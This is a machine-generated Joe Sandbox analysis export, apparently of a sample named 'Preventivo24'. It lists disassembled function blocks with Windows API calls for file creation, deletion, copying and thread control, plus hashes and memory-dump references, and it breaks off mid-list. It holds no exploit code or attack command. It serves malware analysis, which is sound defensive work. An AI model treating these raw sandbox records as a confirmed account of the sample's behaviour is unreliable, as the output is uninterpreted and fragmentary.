                                                                              • Opcode Fuzzy Hash: 74394019640cc6c47444f4b4f32b46df4faf3f63119a23111e5deb74f2d40bd0
                                                                              • Instruction Fuzzy Hash: 1FD1D331A00659DFDB04DFA8C855BADB7B5FF48320F244259E925AB3D1EB34AE01CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983), ref: 00FBD4B0
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • DeleteFileW.KERNEL32(?,B5580983,?,?,?,?,00000000,010B6CAD,000000FF,?,00FBD21A), ref: 00FBD4EB
                                                                              • GetLastError.KERNEL32(?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983,?,?,00000000,?,?,010B6CAD), ref: 00FBD4FB
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile$ErrorFindHeapLastProcessResource
                                                                              • String ID: \\?\
                                                                              • API String ID: 2079828947-4282027825
                                                                              • Opcode ID: e36c33e2b335dccc2f3f0854d0ccf2206b8d4bd0233f4390424ef61f6db044a6
                                                                              • Instruction ID: dd8dfa4595dc29eadca2fcc951abe6d561d6d9d02d2ab1d0e993523a6807b6a8
                                                                              • Opcode Fuzzy Hash: e36c33e2b335dccc2f3f0854d0ccf2206b8d4bd0233f4390424ef61f6db044a6
                                                                              • Instruction Fuzzy Hash: 6F31A036A00619DFDB14DFA9D848BADB7B8FF05320F144569E825E7390EB39A900DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 00FD9208
                                                                                • Part of subcall function 00FEBC30: CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,0116001C,00000000,?), ref: 00FEBCAD
                                                                                • Part of subcall function 00FEBC30: GetLastError.KERNEL32 ref: 00FEBCBA
                                                                                • Part of subcall function 00FEBC30: WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00FEBCE3
                                                                                • Part of subcall function 00FEBC30: GetExitCodeThread.KERNEL32(00000000,?), ref: 00FEBCFD
                                                                                • Part of subcall function 00FEBC30: TerminateThread.KERNEL32(00000000,00000000), ref: 00FEBD15
                                                                                • Part of subcall function 00FEBC30: CloseHandle.KERNEL32(00000000), ref: 00FEBD1E
                                                                              • GetTickCount.KERNEL32 ref: 00FD9430
                                                                              • __Xtime_get_ticks.LIBCPMT ref: 00FD9438
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD9491
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CloseCodeCountCreateErrorExitHandleHeapInitializeLastObjectProcessSingleTerminateTickUnothrow_t@std@@@WaitXtime_get_ticks__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 3268554900-0
                                                                              • Opcode ID: ba245a0d361fb1be1d23fc2e791039d33bab2a4d5a21abb652af3df33768cb45
                                                                              • Instruction ID: 3c1948875575852a3de7238acc91d1bdcf80bcc18420e1f709528d82c6a8a430
                                                                              • Opcode Fuzzy Hash: ba245a0d361fb1be1d23fc2e791039d33bab2a4d5a21abb652af3df33768cb45
                                                                              • Instruction Fuzzy Hash: 45D1B271E04209DFDB14DFA8C845BAEBBB9FF48324F14416AE915A7381DB74AA05CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,B5580983,?,00000004), ref: 00E9381B
                                                                              • DeleteFileW.KERNEL32(?,?,00000004), ref: 00E9385F
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000004), ref: 00E9386E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateDeleteDirectoryNameTemp
                                                                              • String ID:
                                                                              • API String ID: 2411147693-0
                                                                              • Opcode ID: fd19db14a280b1ef753a1dd3f57ed2f700924243a5d666bd49bad12c5180c20a
                                                                              • Instruction ID: d9a21610e66df6a104fecfd740a859db4732808f0c39121a707d828f81d99267
                                                                              • Opcode Fuzzy Hash: fd19db14a280b1ef753a1dd3f57ed2f700924243a5d666bd49bad12c5180c20a
                                                                              • Instruction Fuzzy Hash: 5BD16C70D042499FDB24DF68C9997EDBBB4EF55304F20429AE819A7281EB746B84CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,B5580983), ref: 00FE27DD
                                                                              • GetLastError.KERNEL32 ref: 00FE27E5
                                                                              • RemoveDirectoryW.KERNEL32(?,B5580983), ref: 00FE284D
                                                                              • GetLastError.KERNEL32 ref: 00FE2855
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$DeleteDirectoryFileRemove
                                                                              • String ID:
                                                                              • API String ID: 50330452-0
                                                                              • Opcode ID: 19a2695acc3c3dcf0ce4f0320f16aefa763c8fcdef9647dd8fe43c1e91c28a5a
                                                                              • Instruction ID: a1bab6755390bb42bff6d259aef4998b33a8bb0f2f5da6c9991038053a5cb80d
                                                                              • Opcode Fuzzy Hash: 19a2695acc3c3dcf0ce4f0320f16aefa763c8fcdef9647dd8fe43c1e91c28a5a
                                                                              • Instruction Fuzzy Hash: FD51D13190025CCFCF50CF55C884BDEB7B9FF05310F0541A9D915AB285EB38AA48EBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,B5580983,?,00000010,?,00FDD2A0,000000FF), ref: 00FD8E36
                                                                              • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 00FD8E7F
                                                                              • ReadFile.KERNEL32(00000000,B5580983,?,000000FF,00000000,00000078,?), ref: 00FD8EC1
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00FD8F58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                              • String ID:
                                                                              • API String ID: 2405668454-0
                                                                              • Opcode ID: 4ec40d80782a0ccd83a805753dc9fa3690d068d05b4ac5f19c4d5a4b65bfbfc0
                                                                              • Instruction ID: 609768bbe71a56994182991fe5df399212e544d738dee1bb07ff1d5abd591217
                                                                              • Opcode Fuzzy Hash: 4ec40d80782a0ccd83a805753dc9fa3690d068d05b4ac5f19c4d5a4b65bfbfc0
                                                                              • Instruction Fuzzy Hash: D15191719006099BDB15CB98CD48BAEBBBAEF04324F284259F921B73C1CB749D46CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00FC7A40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,B5580983,00000000,00000000,?), ref: 00FC7A9B
                                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,00000000,?,B5580983,00000000,?,?,?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC7FCD
                                                                              • GetFileVersionInfoW.KERNELBASE(?,00000000,010F8075,00000000,00000000,?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC7FF9
                                                                              • GetLastError.KERNEL32(?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC803E
                                                                              • DeleteFileW.KERNEL32(?), ref: 00FC8051
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
                                                                              • String ID:
                                                                              • API String ID: 2825328469-0
                                                                              • Opcode ID: 842ed73fa959c5ddb09cd4b253b94c1f95f1cc7f09f50560108b08d067990c48
                                                                              • Instruction ID: 62d6e33c6576feaa42c4742af37531fcb48ffbf132fa40f1737eb3f55313aea4
                                                                              • Opcode Fuzzy Hash: 842ed73fa959c5ddb09cd4b253b94c1f95f1cc7f09f50560108b08d067990c48
                                                                              • Instruction Fuzzy Hash: 0031A171D0120AABDB14DFA5C945FEEBBB8FF483A0F14416EE411B3240DB399945DBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • PathIsUNCW.SHLWAPI(?,?), ref: 00FBDACD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: HeapPathProcess
                                                                              • String ID: \\?\$\\?\UNC\
                                                                              • API String ID: 300331711-3019864461
                                                                              • Opcode ID: 0fe8050d5ca09724cda9464d923721273163dc8ea8267150d7aec7f23f3e0ffc
                                                                              • Instruction ID: ab512e00d1e7fa7d99066606165c1da5c845d6c0f5eedc682f344e7831b696d1
                                                                              • Opcode Fuzzy Hash: 0fe8050d5ca09724cda9464d923721273163dc8ea8267150d7aec7f23f3e0ffc
                                                                              • Instruction Fuzzy Hash: D2D1D071A006098BDB04DBA9CC55BEEB7F9EF48320F184168E521A73D1EB78AD05CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CopyFileW.KERNEL32(?,B55809A3,00000000,00000000,-00000002,0115D178,?,?,B5580983,01102006,000000FF), ref: 00FFEC30
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                                • Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
                                                                                • Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CopyErrorFileFormatHeapLastMessageProcess
                                                                              • String ID: Downloading of updates failed. Error:$upd
                                                                              • API String ID: 2459518595-329979656
                                                                              • Opcode ID: 48e8af32492a9d3e47d666ffd7f8bb6114d691b31b7976ea02e6f4abe617505e
                                                                              • Instruction ID: 7e1b2a2df60c876bea3159100a0ad5f16a5ed3ef1d469d83b2986f1092ef2337
                                                                              • Opcode Fuzzy Hash: 48e8af32492a9d3e47d666ffd7f8bb6114d691b31b7976ea02e6f4abe617505e
                                                                              • Instruction Fuzzy Hash: CF71E531A00249DBDB18DF68CC55BBEB7A6FF44320F18425DE526AB2E1DB34AE05DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,B5580983,00000000,00000010,?,00000010,?), ref: 00FE2F8B
                                                                              • GetLastError.KERNEL32 ref: 00FE2FCD
                                                                              • GetLastError.KERNEL32(?), ref: 00FE3071
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateFile
                                                                              • String ID:
                                                                              • API String ID: 1722934493-0
                                                                              • Opcode ID: 6cd264979d0dd5ac5b08238329fd7d7060e31fa402d722d0c7c11485ed36be8f
                                                                              • Instruction ID: 14f39b99844601209298d5a6d85fbe50c8b5385bfc5981f4ac27189f7b7ddc48
                                                                              • Opcode Fuzzy Hash: 6cd264979d0dd5ac5b08238329fd7d7060e31fa402d722d0c7c11485ed36be8f
                                                                              • Instruction Fuzzy Hash: B461EF31A00646EFDB18DB29C849BAAF3B5FF44320F14426DE825A72C1EB75B901CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(0101CA81,40000000,00000001,00000000,00000002,00000080,00000000,B5580983,?,?), ref: 0101BB02
                                                                              • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,0000C800), ref: 0101BBA8
                                                                              • CloseHandle.KERNEL32(00000000,?,0000C800), ref: 0101BC1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 1065093856-0
                                                                              • Opcode ID: ca18c84cc631ff833ce1fb52d916fa60dff95217518864215b76abc965f7ce18
                                                                              • Instruction ID: 19ce5963b02cd79d81377fb3f86c8b9a633f574680f55ed5967fd161c0a16752
                                                                              • Opcode Fuzzy Hash: ca18c84cc631ff833ce1fb52d916fa60dff95217518864215b76abc965f7ce18
                                                                              • Instruction Fuzzy Hash: E5518F71A01209AFDB14DF98DA44BEEBBF9FF48314F204159E850B7294DB759A00CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PathIsUNCW.SHLWAPI(?,B5580983,00000000,?,?,?,?,?,010F68C5,000000FF,?,00FD156C,00000000,?,?), ref: 00FBDD5B
                                                                              • CreateDirectoryW.KERNEL32(010F68C5,00000000,?,00000000,01153928,00000001), ref: 00FBDE1A
                                                                              • GetLastError.KERNEL32 ref: 00FBDE28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLastPath
                                                                              • String ID:
                                                                              • API String ID: 953296794-0
                                                                              • Opcode ID: 6c60debbda7276a013a38c4191eb3544545fd9506d0adbf174f3a69b188f957e
                                                                              • Instruction ID: f49ff3729be68afcdd43c449bf5a0cb3cbce4271455c50d1ad352aec7fc383f6
                                                                              • Opcode Fuzzy Hash: 6c60debbda7276a013a38c4191eb3544545fd9506d0adbf174f3a69b188f957e
                                                                              • Instruction Fuzzy Hash: B761BD31A04609CFDB14DFA9C885BEDBBF0FF18324F144569E425A7291EB35A905CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
